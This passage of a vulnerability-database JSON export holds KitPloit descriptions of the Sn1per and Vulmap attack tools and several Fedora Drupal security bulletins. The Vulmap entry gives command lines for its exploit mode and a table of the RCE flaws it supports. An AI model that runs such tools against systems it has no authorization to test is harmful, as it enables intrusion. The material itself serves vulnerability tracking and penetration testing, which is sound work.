Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly).\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **WEBSCAN:** Launches a full HTTP & HTTPS web application scan against via Burpsuite and Arachni.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per](<https://github.com/1N3/Sn1per> \"Download Sn1per\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-05-12T13:09:00", "type": "kitploit", "title": "Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2015-8249", "CVE-2017-10271", "CVE-2017-12617", "CVE-2017-5638", "CVE-2017-7269", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-11776", "CVE-2018-7600"], "modified": "2019-05-12T13:09:05", "id": "KITPLOIT:7013881512724945934", "href": "http://www.kitploit.com/2019/05/sn1per-v70-automated-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T12:02:21", "description": "[](<https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s678/vulmap.png>)\n\n \n\n\nVulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists.\n\nVulmap currently has vulnerability scanning (poc) and exploiting (exp) modes. Use \"-m\" to select which mode to use, and the default poc mode is the default. In poc mode, it also supports \"-f\" batch target scanning, \"-o\" File output results and other main functions, Other functions [Options](<https://github.com/zhzyker/vulmap/#options>) Or python3 vulmap.py -h, the Poc function will no longer be provided in the exploit exploit mode, but the exploit will be carried out directly, and the exploit result will be fed back to further verify whether the vulnerability exists and whether it can be exploited.\n\n**Try to use \"-a\" to establish target types to reduce false positives, such as \"-a solr\"**\n\n \n\n\n### Installation\n\nThe operating system must have python3, python3.7 or higher is recommended\n\n * Installation dependency\n \n \n pip3 install -r requirements.txt\n \n\n * Linux & MacOS & Windows\n \n \n python3 vulmap.py -u http://example.com\n \n\n \n\n\n### Options\n \n \n optional arguments:\n -h, --help show this help message and exit\n -u URL, --url URL Target URL (e.g. -u \"http://example.com\")\n -f FILE, --file FILE Select a target list file, and the url must be distinguished by lines (e.g. -f \"/home/user/list.txt\")\n -m MODE, --mode MODE The mode supports \"poc\" and \"exp\", you can omit this option, and enter poc mode by default\n -a APP, --app APP Specify a web app or cms (e.g. -a \"weblogic\"). default scan all\n -c CMD, --cmd CMD Custom RCE vuln command, Other than \"netstat -an\" and \"id\" can affect program judgment. defautl is \"netstat -an\"\n -v VULN, --vuln VULN Exploit, Specify the vuln number (e.g. -v \"CVE-2020-2729\")\n --list Displays a list of vulnerabilities that support scanning\n --debug Debug mode echo request and responses\n --delay DELAY Delay check time, default 0s\n --timeout TIMEOUT Scan timeout time, default 10s\n --output FILE Text mode export (e.g. -o \"result.txt\")\n \n\n \n\n\n### Examples\n\nTest all vulnerabilities poc mode\n \n \n python3 vulmap.py -u http://example.com\n \n\nFor RCE vuln, use the \"id\" command to test the vuln, because some linux does not have the \"netstat -an\" command\n \n \n python3 vulmap.py -u http://example.com -c \"id\"\n \n\nCheck <http://example.com> for struts2 vuln\n \n \n python3 vulmap.py -u http://example.com -a struts2\n \n \n \n python3 vulmap.py -u http://example.com -m poc -a struts2\n \n\nExploit the CVE-2019-2729 vuln of WebLogic on <http://example.com:7001>\n \n \n python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n \n \n \n python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729\n \n\nBatch scan URLs in list.txt\n \n \n python3 vulmap.py -f list.txt\n \n\nExport scan results to result.txt\n \n \n python3 vulmap.py -u http://example.com:7001 -o result.txt\n \n\n \n\n\n### Vulnerabilitys List\n\nVulmap supported vulnerabilities are as follows\n \n \n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |\n | Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here |\n | Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |\n | Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |\n | Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |\n | Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |\n | Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce |\n | Apache Struts2 | S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |\n | Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |\n | Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |\n | Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |\n | Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |\n | Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |\n | Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |\n | Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |\n | Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |\n | Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |\n | Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |\n | Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |\n | Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |\n | Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |\n | Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |\n | Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |\n | Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |\n | Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |\n | Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability |\n | Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability |\n | Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |\n | Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |\n | Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |\n | Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |\n | RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |\n | RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |\n | RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |\n | ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |\n | ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n \n\n \n\n\n### Docker\n \n \n docker build -t vulmap/vulmap .\n docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com\n\n \n\n\n \n \n\n\n**[Download Vulmap](<https://github.com/zhzyker/vulmap> \"Download Vulmap\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-25T11:30:00", "type": "kitploit", "title": "Vulmap - Web Vulnerability Scanning And Verification Tools", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0738", "CVE-2010-1428", "CVE-2010-1870", "CVE-2011-3923", "CVE-2013-1966", "CVE-2013-2134", "CVE-2013-2251", "CVE-2014-4210", "CVE-2015-7501", "CVE-2016-3081", "CVE-2016-4437", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-12615", "CVE-2017-12629", "CVE-2017-3506", "CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-20062", "CVE-2018-2894", "CVE-2018-7600", "CVE-2018-7602", "CVE-2019-0193", "CVE-2019-0230", "CVE-2019-17558", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-6340", "CVE-2019-7238", "CVE-2019-9082", "CVE-2020-10199", "CVE-2020-14882", "CVE-2020-1938", "CVE-2020-2551", "CVE-2020-2555", "CVE-2020-2729", "CVE-2020-2883"], "modified": "2020-12-25T11:30:06", "id": "KITPLOIT:5420210148456420402", "href": "http://www.kitploit.com/2020/12/vulmap-web-vulnerability-scanning-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-10T19:16:35", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: drupal7-7.59-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6929", "CVE-2017-6932", "CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-05-10T19:16:35", "id": "FEDORA:9FC6E6070D50", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GYT7R43FLLEEG4N2QS3FDGZ3NNHOL3HL/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-09T21:27:49", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.4.8-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861"], "modified": "2018-05-09T21:27:49", "id": "FEDORA:5C39A60311F1", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/OKWJWSEKSJJSQ7G5K3DVNXGLB44LQX64/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-10T19:13:53", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: drupal8-8.4.8-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861"], "modified": "2018-05-10T19:13:53", "id": "FEDORA:17401605E206", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/L2NHXS355OJ7C7ZEAGKMOPFWU6SUYYUV/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-03T01:39:06", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.6.2-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861"], "modified": "2018-12-03T01:39:06", "id": "FEDORA:4B26D6048172", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZGZBSHQC6C3WLIATUZXNKC3DB73ADIXZ/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-03-07T20:06:44", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.6.10-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861"], "modified": "2019-03-07T20:06:44", "id": "FEDORA:7595560DCBCA", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GLVLVCDPE4WHN5IUYGRFCMSNPXSJ56PU/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-24T04:02:47", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: drupal8-8.4.6-3.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6930", "CVE-2017-6931", "CVE-2017-6932", "CVE-2018-7600"], "modified": "2018-04-24T04:02:47", "id": "FEDORA:9DFEE60469B4", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/XWSND764JDPO7QHXKOFVZCECOMLR3N6L/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-10T19:11:07", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: drupal7-7.59-1.fc26", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6922", "CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6929", "CVE-2017-6932", "CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-05-10T19:11:07", "id": "FEDORA:45D79604B015", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/6MFVJWW3I4N6VEV7R3N23SPQMTUAXVS5/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-27T04:14:07", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.4.6-3.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6930", "CVE-2017-6931", "CVE-2017-6932", "CVE-2018-7600"], "modified": "2018-04-27T04:14:07", "id": "FEDORA:D89B16076A01", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/XXVDKJCOAT4CADPHTJSB5HZN6IISPDTE/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-02T01:37:00", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.6.13-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 